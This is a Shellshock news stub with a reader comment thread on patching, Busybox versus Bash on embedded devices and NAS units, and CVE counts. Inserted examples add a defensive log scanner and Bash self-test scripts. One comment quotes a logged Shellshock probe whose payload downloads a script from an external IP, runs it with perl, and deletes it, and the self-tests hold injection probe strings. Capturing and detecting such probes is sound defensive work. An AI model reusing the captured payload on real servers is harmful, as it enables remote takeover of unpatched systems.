SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches

The majority of Fortune 1000 and Global 2000 companies have already deployed, or are now deploying, Shellshock patches to fend off code attacks, according to cloud security firm CloudPassage. The Shellshock vulnerability allows remote attackers to execute arbitrary code on servers using a variety of techniques, with the CVE- …

  1. Jim 59

    Carson Sweet (excellent name) stop telling everyone that embedded devices like "TVs to soda machines" are vulnerable. They run Busybox Ash, not Bash. Or if you know any that do run bash, say which.

    To any poor citizens half way up a ladder clawing their IP cameras off the wall - LEAVE IT. Go check your web servers instead.

    1. Doctor Syntax Silver badge

      @ Jim 59

      If you think about it he's performing a useful service in telling the world about the competence of his company.

    2. Anonymous Coward

      I imagine that Microsoft consultancies are having a very busy week quoting for migrations to Windows Server / IIS. After Open SSL this must be the final straw for lots of current OSS users.

      1. vagabondo

        @AC re: MS consultants

        " Microsoft consultancies are having a very busy week "

        Do you know any Microsoft consultants that offer a credible no-bugs guarantee? Or even an SLA that specifies security patches within 5 days of discovery?

        1. Graham 24

          Re: @AC re: MS consultants

          I don't know of any Linux distributions (or any operating system for that matter) that offers those either.

          There may well be a large amount of "the grass is greener over there" being applied, though, which may well drive some changes.

      2. Anonymous Coward

        > After Open SSL this must be the final straw for lots of current OSS users.

        You mean the OpenSSL that was a problem for Windows machines as well?

        1. Anonymous Coward

          >You mean the OpenSSL that was a problem for Windows machines as well?

          Only on those Windows machines where some moron had installed OpenSSL, because everyone knows Open Source is more secure than the native MS SSL service.

        2. Anonymous Coward

          "You mean the OpenSSL that was a problem for Windows machines as well?"

          Windows does not use Open SSL. It has much faster and more secure inbuilt SSL libraries.

      3. Anonymous Coward

        I imagine that Microsoft consultancies are having a very busy week quoting for migrations to Windows Server / IIS. After Open SSL this must be the final straw for lots of current OSS users.

        You know, I'm not even going to retype my answer:

        That comment deserves nothing more than recycled keystrokes

        1. Anonymous Coward

          "You know, I'm not even going to retype my answer:"

          Thanks for sparing us - what a load of verbiage that was.

          The facts are that Windows Server based webservers are 4-5 times less likely to be remotely exploited than Linux based ones according to defacement statistics - and that Windows Server has far fewer security vulnerabilities to evaluate and patch than enterprise Linux distributions - and Windows Server has a faster average fix time and fewer days at risk than enterprise Linux distributions like Red Hat and SUSE.

          This is largely why Windows Server / IIS is now the most popular web server platform by market share.

          The recent OpenSSL and Bash demonstrations that the long-standing claims that OSS is somehow more secure because lots of people can view the code are complete and utter bollocks can only accelerate the current trend of migrations to Windows Server ....

    3. Anonymous Coward

      Don't forget water dispensers too.

  2. Camilla Smythe

    Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

    Meh..? Obviously I am dumb but doesn't 'update manager', or some other bit of tut, moan at people to update bits such as this or is the article suggesting 'Fortune 1000 Overlords' ignore such advice until they crap a load of someone else's money over to crooks, themselves, and then pay themselves bigger bonuses?

    1. Graham 24

      Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

      The trouble is, you really don't want to get notified every time one of the packages that's installed on a typical Linux system is updated in one of the main repos. The signal-to-noise ratio would render such notifications useless.

      Very few systems are truly "up to date" in that all the software is the very latest that's available. This is even more true for corporate production servers, which tend to be conservatively managed, with a preference for stability over security.

      1. Doctor Syntax Silver badge

        Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

        "The trouble is, you really don't want to get notified every time one of packages that's installed on a typical Linux system is updated in one of the main repos. The signal-to-noise ratio would render such notifications useless."

        Why not? There was a batch of Debian updates this morning. Open a terminal, apt-get upgrade, check what it was - latest version of Chromium, OK it, download and install, job done in a few seconds, close terminal. It's not like the monthly Win 7 updates which seem to take hours and need a few reboots along the way.

        Agreed servers are another kettle of fish entirely but that's because you'd need to check the updates don't break anything and the occasional kernel upgrade would need a reboot but in general distros aimed at servers have quite conservative attitudes to upgrades.

      2. vagabondo

        Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

        "you really don't want to get notified every time one of packages that's installed "

        That's not the point. We keep all of our critical systems on stable, long-term tested software versions, except we apply security patches automatically within 24 hours of their release. These are normally backports, and do not push our software to the latest packages. This is a standard feature of serious distributions and is trivial to implement. The risk of a security patch taking a system down is trivial compared to the potential consequences of leaving a known vulnerability open.

        1. Graham 24

          Re: Fortune 1000 overlords SHELLSHOCKED into Bash patch batch

          "all of our critical systems on stable, long-term tested software"

          "apply security patches automatically within 24 hours of their release"

          The first is sensible, but can't be true if the second is true. It can't be really considered stable if you change it as soon as a security fix comes out.

          "The risk of a security patch tacking a system down is trivial compared to the potential consequences of leaving a known vulnerability open."

          Not sure I'd agree with that. I'd agree it's probably less, but there's many a bug been introduced because someone was in a hurry to get a patch out. The original ShellShock patch has undergone at least two modifications after its initial release.

  3. Jim 59

    Meanwhile, on a web server that was already patched twice

    173.45.100.18 - - [28/Sep/2014:17:27:34 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

    1. bob, mon!

      Re: Meanwhile, on a web server that was already patched twice

      Why the downvotes? It looks to me like Jim 59 is just reporting that someone attempted the crack on his webserver. He says the machine's already patched....

      1. Anonymous Coward

        Re: Meanwhile, on a web server that was already patched twice

        Indeed, I suppose it's people who think such patches should make those crack-attempts invisible. Or those who maybe wish their commercial software supplier was as swift delivering fixes.

        I find it rather telling that this apparently 20+-year-old bug has only just started being exploited within the last week.

        I've certainly seen a few attempts myself now.

      2. Jim 59

        Re: Meanwhile, on a web server that was already patched twice

        Yes. It was a line from an Apache log showing some kiddy from Ohio trying to exploit the bug. It has taken the script kiddies three times as long to learn the exploit as it took the distros to publish the patches.

        1. Anonymous Coward

          Re: Meanwhile, on a web server that was already patched twice

          "It has taken the script kiddies three times as long to learn the exploit than it took the distros to publish the patches."

          Except that the first 2 patches didn't work. And my money is on yet more holes being found. The only real solution is migrate to something more secure like Windows Server (or OpenBSD if you prefer to use a legacy / *NIX type OS.)
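The log line Jim 59 posted above is the textbook CVE-2014-6271 delivery: a request header whose value begins with `() {`, which a pre-patch Bash parsed as an exported function definition when a CGI handler put the header into its environment, then ran whatever followed the closing brace. The scanner below is an added example and is not code from the thread or from The Register: it walks an Apache combined-format access log and prints the client address and the offending header value for every request whose quoted fields start with `() {`, honouring the `\"` escapes Apache writes for quotes inside a header. The sample log is constructed (Jim 59's own line plus two invented lines on RFC 5737 documentation addresses); the function names and the SHELLSHOCK_DEMO variable are the example's own.

```shell
#!/bin/sh
# Added example: flag Shellshock (CVE-2014-6271 family) probes in an Apache
# combined-format access log. Not from the thread; names are the example's own.

# Constructed sample: the first line is the one Jim 59 posted above; the other
# two are invented (RFC 5737 documentation addresses).
SAMPLE_LOG='173.45.100.18 - - [28/Sep/2014:17:27:34 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
192.0.2.10 - - [28/Sep/2014:17:30:01 +0100] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Sep/2014:17:31:12 +0100] "GET /cgi-bin/status HTTP/1.1" 500 0 "() {:; }; /usr/bin/id" "curl/7.30.0"'

write_sample_log() {
    printf '%s\n' "$SAMPLE_LOG" > "$1"
}

# Print "<client ip><TAB><payload>" for every request in the log file $1 whose
# quoted header fields (Referer, User-Agent, ...) begin with "() {". That
# prefix is what a pre-patch Bash took as an exported function definition;
# anything after the closing brace was run as a command when a CGI script
# started Bash with that header in its environment. The payload is copied up
# to the closing quote, keeping the \" escapes Apache writes for embedded
# quotes so the attacker's command line survives intact.
shellshock_hits() {
    awk '
    {
        n = match($0, /"[(][)][ \t]*[{]/)
        if (n == 0) next
        rest = substr($0, n + 1)            # skip the opening quote
        payload = ""
        i = 1
        while (i <= length(rest)) {
            c = substr(rest, i, 1)
            if (c == "\\") { payload = payload substr(rest, i, 2); i += 2; continue }
            if (c == "\"") break
            payload = payload c
            i++
        }
        printf "%s\t%s\n", $1, payload
    }' "$1"
}

# Number of probing requests in the log file $1.
shellshock_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# Demo when run directly: write the constructed sample and report on it.
if [ "${SHELLSHOCK_DEMO:-1}" = 1 ]; then
    tmp=$(mktemp)
    write_sample_log "$tmp"
    echo "probes found: $(shellshock_count "$tmp")"
    shellshock_hits "$tmp"
    rm -f "$tmp"
fi
```

Only the `() {` prefix is matched on purpose: the commands that follow vary from probe to probe (Jim's downloads a Perl bot, others run `/usr/bin/id` or ping a callback host), so matching on the function-definition marker catches them all, while a rule keyed on a particular wget URL would catch only one campaign. On a patched server the hits are harmless, but the source addresses are still worth feeding to a blocklist.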

  4. a_mu

    nas and modems

    How does this affect the 1001 NAS, media server, TV and modem devices around that run a version of Linux?

    Are we going to have to re-flash all our devices around the house?

    Any one unpatched one and the network is open, is it not!

    EEK,

    1. Doctor Syntax Silver badge

      Re: nas and modems

      Read Jim 59's first post above.

    2. Anonymous Coward

      Re: nas and modems

      How does this affect the 1001 NAS, media server, TV's and modems around that run a version of Linux

      Like This.

      Very few of those devices actually have the OS-image storage for a full-blown GNU/Linux distribution. Most are a cut-down Linux OS based around Busybox, which according to that test I did, isn't vulnerable.

      Even a NAS, which may have big HDDs installed, won't be using those HDDs for the OS, it'll have a small flash chip somewhere with a minimal OS on it.

      1. Sandtitz Silver badge

        Re: nas and modems @Stuart Longland

        "Even a NAS, which may have big HDDs installed, won't be using those HDDs for the OS, it'll have a small flash chip somewhere with a minimal OS on it."

        The "minimal OS" may be minimal compared to any desktop OS but those OS firmware downloads are often 100+ MB in size and in general reside on the HDD.

        A cursory search reveals that at least the following manufacturers use or have used Bash in their NAS products.

        - Synology

        - Thecus

        - QNAP

        - Buffalo

        - Seagate

        - Lacie

        1. Jim 59

          Re: nas and modems @Stuart Longland

          Hi Sandtitz could you name some products found in your 'cursory search' to be using bash.

          My Buffalo Linkstation Live NAS uses Busybox/ash.

          1. Sandtitz Silver badge

            Re: nas and modems @Jim

            Sure, I basically googled product + bash:

            Synology has issued an advisory for the Bash issues.

            Ditto for QNAP.

            I couldn't find anything official for Thecus, but users at their forum are reporting that their Bash shells are vulnerable.

            "Buffalo Linkstation hacked using Bash" reported here.

            This is a bit of conjecture but for Seagate at least the GoFlex NAS has a script available that specifically calls for /bin/bash.

            As it happens I cannot find anything for Lacie - perhaps I misread some forum posts, sorry for that!

        2. Anonymous Coward

          Re: nas and modems @Stuart Longland

          Indeed, it'll be more substantial than that of a router, because it probably has Samba for Windows File Sharing, some media streaming tools, web/FTP server, etc…

          This does not necessarily mean that bash is being used. You'll need filesystem access to actually know for sure, just looking at the size of the firmware blob isn't going to tell you.

  5. Levente Szileszky

    It's not one patch but actually FOUR (4) CVEs...

    ...at least according to Red Hat:

    CVE-2014-6271

    CVE-2014-7169

    CVE-2014-7186

    CVE-2014-7187

    More details here: https://securityblog.redhat.com/2014/09/26/frequently-asked-questions-about-the-shellshock-bash-flaws/

    1. Anonymous Coward

      Re: It's not one patch but actually FOUR (4) CVEs...

      Red Hat are 2 behind then. It's now 6 CVEs!
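Red Hat's FAQ linked above gives a one-line self-test for each of the four CVEs it lists. The script below is an added example, not code from the thread or from Red Hat: it wraps those published checks in POSIX sh functions that report `patched`, `vulnerable` or `skipped` (no bash on PATH), so the same probe can be run unattended across a fleet and graded on its exit status. It covers only the four CVEs named in the comment; the two further CVEs the reply mentions are not named on the page and are not tested. The function names and the BASH_BIN variable are the example's own.

```shell
#!/bin/sh
# Added example: wrap Red Hat's published one-line self-tests for the four
# Shellshock CVEs in functions that report "patched", "vulnerable" or
# "skipped" (no bash found). Not from the thread or from Red Hat; the
# function names and BASH_BIN are the example's own.

BASH_BIN="${BASH_BIN:-$(command -v bash 2>/dev/null || true)}"

# CVE-2014-6271: a pre-patch Bash imported any environment variable whose value
# began with "() {" as a function and ran whatever followed the closing brace.
check_cve_2014_6271() {
    [ -n "$BASH_BIN" ] || { echo skipped; return 0; }
    out=$(x='() { :;}; echo vulnerable' "$BASH_BIN" -c 'echo probe' 2>/dev/null || true)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# CVE-2014-7169: the first fix still let the parser carry a dangling
# redirection out of the imported definition, so "bash -c 'echo probe'"
# creates a file named "echo" in the current directory on affected builds.
check_cve_2014_7169() {
    [ -n "$BASH_BIN" ] || { echo skipped; return 0; }
    dir=$(mktemp -d 2>/dev/null) || { dir="/tmp/ss7169.$$"; mkdir -p "$dir"; }
    ( cd "$dir" && X='() { (a)=>\' "$BASH_BIN" -c 'echo probe' >/dev/null 2>&1 ) || true
    if [ -e "$dir/echo" ]; then r=vulnerable; else r=patched; fi
    rm -rf "$dir"
    echo "$r"
}

# CVE-2014-7186: too many here-documents on one command overflowed
# redir_stack and crashed the shell; a patched bash only warns.
check_cve_2014_7186() {
    [ -n "$BASH_BIN" ] || { echo skipped; return 0; }
    if "$BASH_BIN" -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' >/dev/null 2>&1
    then echo patched; else echo vulnerable; fi
}

# CVE-2014-7187: 200 nested "for" loops walked off the end of word_lineno.
# Built with a counter loop rather than {1..200} so the driver stays POSIX sh.
check_cve_2014_7187() {
    [ -n "$BASH_BIN" ] || { echo skipped; return 0; }
    script=""
    i=1
    while [ "$i" -le 200 ]; do
        script="$script
for x$i in ; do :"
        i=$((i + 1))
    done
    i=1
    while [ "$i" -le 200 ]; do
        script="$script
done"
        i=$((i + 1))
    done
    if printf '%s\n' "$script" | "$BASH_BIN" >/dev/null 2>&1
    then echo patched; else echo vulnerable; fi
}

# Run every check; return 1 if any reports vulnerable so a fleet-wide driver
# (ssh in a loop, a config-management check, ...) can grade the host.
shellshock_report() {
    rc=0
    for cve in 6271 7169 7186 7187; do
        r=$(check_cve_2014_$cve)
        printf 'CVE-2014-%s: %s\n' "$cve" "$r"
        [ "$r" = vulnerable ] && rc=1
    done
    return $rc
}

shellshock_report || echo "WARNING: the bash at ${BASH_BIN:-<none>} needs patching"
```

The checks deliberately run the bash found on PATH rather than `/bin/sh`: on Debian-derived systems `/bin/sh` is dash, which was never affected, and a host can have a patched `/bin/sh` next to an unpatched `/bin/bash` that CGI scripts with a `#!/bin/bash` line still reach. Set BASH_BIN to test a different binary, for example one unpacked from a NAS firmware image.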

  6. RedneckMother

    "Unix\Linux" (in article text)

    <insert Michael Palin voice> Ooh! What a giveaway!
